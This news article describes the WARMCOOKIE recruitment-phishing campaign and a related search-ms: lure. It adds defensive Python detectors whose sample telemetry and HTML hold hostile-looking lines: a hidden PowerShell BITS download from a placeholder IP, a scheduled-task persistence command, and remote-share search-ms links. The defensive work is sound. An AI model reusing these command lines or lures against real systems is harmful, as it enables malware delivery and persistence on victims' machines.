A new phishing campaign is targeting jobseekers. Researchers report that the WARMCOOKIE backdoor gains a foothold in victim networks by luring users into clicking links in recruitment-themed emails; that foothold is then used to deploy further malicious payloads.
The campaign, tracked by Elastic Security Labs as REF6127, delivers a backdoor that can capture screenshots in addition to its main job of fetching and running additional malware.
WARMCOOKIE Backdoor Capabilities
WARMCOOKIE functions as an initial backdoor tool designed to infiltrate victim networks and deploy further malicious software.
Elastic Security Labs' researcher Daniel Stepanic explains that each WARMCOOKIE sample includes a hard-coded command-and-control (C2) IP address and RC4 encryption key. The backdoor is capable of:
Fingerprinting infected machines
Capturing screenshots
Deploying additional malware
Attack Chain and Delivery Mechanism
Since late April, the phishing campaign has used emails purporting to be from well-known recruitment firms such as Hays, Michael Page, and PageGroup. These emails urge recipients to click on a link to view job opportunities.
Once users click the link, they are prompted to solve a CAPTCHA challenge, which leads to the download of a JavaScript file named "Update_23_04_2024_5689382.js."
"This obfuscated script runs PowerShell, initiating the process to load WARMCOOKIE," notes Elastic. The PowerShell script then uses the Background Intelligent Transfer Service (BITS), a legitimate Windows component, to download the WARMCOOKIE backdoor.
How the Backdoor Emerges
A crucial component of this campaign is the use of compromised infrastructure to host the initial phishing URL. This URL redirects victims to the appropriate landing page, where the malicious payload is delivered. Once on the host, WARMCOOKIE proceeds in two stages:
Creating a scheduled task so the backdoor is relaunched and keeps running after reboots
Performing anti-analysis checks to evade detection, and only then launching its core functionality
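The delivery chain described above (a downloaded .js file run by the Windows script host, which launches PowerShell that fetches the payload over BITS, followed by a scheduled task for persistence) is something a SOC can hunt for in process-creation telemetry. The following is an added example, not code from Elastic Security Labs or this article: it reconstructs parent/child process trees from Sysmon-style events and flags trees that match the chain. The event field names, the sample events, the IP address and the payload paths are all constructed for illustration.

```python
"""Hunt for the WARMCOOKIE-style delivery chain in process-creation telemetry.

Added example (not Elastic's or the article's code). Looks for:
  script host (wscript/cscript) running a .js file
    -> PowerShell descendant that uses BITS to download something
      -> any descendant that registers a scheduled task (persistence)
Event fields (pid, ppid, image, cmd) mimic Sysmon Event ID 1 and are assumed.
"""
import re
from collections import defaultdict

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
JS_ARG = re.compile(r"\.js\b", re.I)
# Start-BitsTransfer cmdlet or bitsadmin /transfer: the two common ways to
# pull a file through BITS from a script.
BITS_USE = re.compile(r"Start-BitsTransfer|bitsadmin(?:\.exe)?\s+/transfer", re.I)
TASK_CREATE = re.compile(r"schtasks(?:\.exe)?\s+/create|Register-ScheduledTask", re.I)


def image_name(path):
    """Return the lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def descendants(root_pid, children):
    """Yield every process below root_pid in the parent/child tree."""
    stack = list(children.get(root_pid, []))
    while stack:
        event = stack.pop()
        yield event
        stack.extend(children.get(event["pid"], []))


def find_delivery_chains(events):
    """Return one finding per script-host-run .js whose subtree pulls a payload via BITS.

    A finding maps stage names to the pid that performed the stage; severity is
    'high' when persistence (scheduled task) was also observed, else 'medium'.
    """
    children = defaultdict(list)
    for event in events:
        children[event["ppid"]].append(event)

    findings = []
    for root in events:
        if image_name(root["image"]) not in SCRIPT_HOSTS or not JS_ARG.search(root["cmd"]):
            continue
        stages = {"js_dropper": root["pid"]}
        for proc in descendants(root["pid"], children):
            if image_name(proc["image"]) in POWERSHELL and BITS_USE.search(proc["cmd"]):
                stages.setdefault("bits_download", proc["pid"])
            if TASK_CREATE.search(proc["cmd"]):
                stages.setdefault("scheduled_task", proc["pid"])
        # A script host alone is noisy; require the BITS download stage.
        if "bits_download" in stages:
            stages["severity"] = "high" if "scheduled_task" in stages else "medium"
            findings.append(stages)
    return findings


# Constructed sample telemetry: one malicious tree, one benign admin script.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\alice\Downloads\Update_23_04_2024_5689382.js"'},
    {"pid": 300, "ppid": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -c Start-BitsTransfer -Source "
            "http://203.0.113.10/update -Destination C:\\ProgramData\\update.tmp"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": 'schtasks.exe /create /tn "Updater" /tr "C:\\ProgramData\\update.exe" /sc minute'},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\cscript.exe",
     "cmd": r"cscript.exe C:\scripts\inventory.js"},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for finding in find_delivery_chains(SAMPLE_EVENTS):
        print(finding)
```

The benign cscript.exe tree is deliberately included: requiring the BITS-download stage before alerting is what keeps the rule from firing on every administrative script, while the scheduled-task stage only raises severity rather than being required, because the task may be created later than the telemetry window.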
Similarities to Previous Campaigns
WARMCOOKIE's behavior resembles artifacts from a previous campaign codenamed Resident, which targeted manufacturing, commercial, and healthcare sectors. The backdoor can:
Read from and write to files
Execute commands using cmd.exe
Retrieve a list of installed applications
Capture screenshots
WARMCOOKIE Might Be New, but It's Gaining Traction Already
Elastic Security Labs emphasizes that WARMCOOKIE is a newly discovered backdoor gaining traction in global phishing campaigns.
The disclosure of this campaign coincides with Trustwave SpiderLabs' report on another phishing campaign using invoice-related decoys and Windows search functionality embedded in HTML code to deploy malware.
Advanced Phishing Techniques
According to The Hacker News, phishing emails in this new campaign contain a ZIP archive with an HTML file. This file uses the legacy Windows "search:" URI protocol handler to display a Shortcut (LNK) file hosted on a remote server in Windows Explorer, making it appear as a local search result.
Clicking the LNK file triggers a batch script (BAT) hosted on the same server, potentially initiating further malicious actions.
Trustwave notes that it could not retrieve the batch script due to an unresponsive server. However, the misuse of search-ms: and search: as malware distribution vectors was previously documented by Trellix in July 2023.
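Because the search: and search-ms: handlers have been abused repeatedly, a mail gateway or sandbox can simply scan HTML attachments for those URIs and treat any whose search scope points at a remote share as hostile. The following is an added example, not code from Trustwave, Trellix or this article: it pulls search URIs out of an HTML document, decodes them, and classifies each by its crumb=location: scope. The crumb=location: parameter is the standard way a search-ms URI names the folder to search; the sample document, the share path and the IP address are constructed for illustration.

```python
"""Flag search: / search-ms: URIs in HTML attachments that point at remote shares.

Added example (not Trustwave's, Trellix's or the article's code). The
search-ms URI form  search-ms:query=<terms>&crumb=location:<folder>&displayname=<label>
is assumed; a UNC location (\\host\share) means Explorer will render results
from an attacker-controlled server, which is the trick the article describes.
"""
import html
import re
from urllib.parse import unquote

# Matches a search: or search-ms: URI wherever it appears: an href, a meta
# refresh target, or a string inside inline JavaScript.
SEARCH_URI = re.compile(r"\bsearch(?:-ms)?:[^\s\"'<>]+", re.I)
LOCATION = re.compile(r"crumb=location:([^&]+)", re.I)


def extract_search_uris(doc):
    """Return decoded search URIs found in an HTML document."""
    text = html.unescape(doc)          # &amp; -> & so parameters split correctly
    return [unquote(m.group(0)) for m in SEARCH_URI.finditer(text)]


def scope_of(uri):
    """Return ('remote', location) for a UNC search scope, ('local', location) otherwise."""
    match = LOCATION.search(uri)
    location = match.group(1) if match else ""
    scope = "remote" if location.startswith("\\\\") else "local"
    return scope, location


def scan_html(doc):
    """Return one finding per search URI with its decoded form, scope and location."""
    findings = []
    for uri in extract_search_uris(doc):
        scope, location = scope_of(uri)
        findings.append({"uri": uri, "scope": scope, "location": location})
    return findings


def verdict(findings):
    """Gateway decision: block on any remote scope, review any other search URI, else allow."""
    if any(f["scope"] == "remote" for f in findings):
        return "block"
    return "review" if findings else "allow"


# Constructed sample attachment: a remote-scope link, a local-scope link, and
# the same remote scope hidden behind percent-encoding inside a script block.
SAMPLE_HTML = r"""<html><body>
<p>Your invoice is ready. <a href="search-ms:query=invoice&amp;crumb=location:\\203.0.113.10\share&amp;displayname=Downloads">Open invoice</a></p>
<a href="search:query=report&amp;crumb=location:C:\Users\Public\Documents">Local report</a>
<script>window.location = "search-ms:query=%2A&crumb=location%3A%5C%5C203.0.113.10%5Cshare";</script>
<p>Our research: nothing to see.</p>
</body></html>"""

if __name__ == "__main__":
    results = scan_html(SAMPLE_HTML)
    for finding in results:
        print(finding["scope"], finding["location"])
    print(verdict(results))
```

Decoding before classification matters: the script-block variant percent-encodes the backslashes, so a scanner that only looks at raw href attributes would miss it. Note also that the word "research:" in body text does not match, because the pattern requires a word boundary before "search".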
The ongoing WARMCOOKIE campaign is one more indication that cybercriminals keep refining their lures and delivery tricks to catch victims off guard.
In both schemes the goal is the same: get a foothold on the network, then deploy additional payloads. The practical defense is the usual one: treat unsolicited recruitment or invoice emails with suspicion, and do not follow links or open attachments from senders you cannot verify.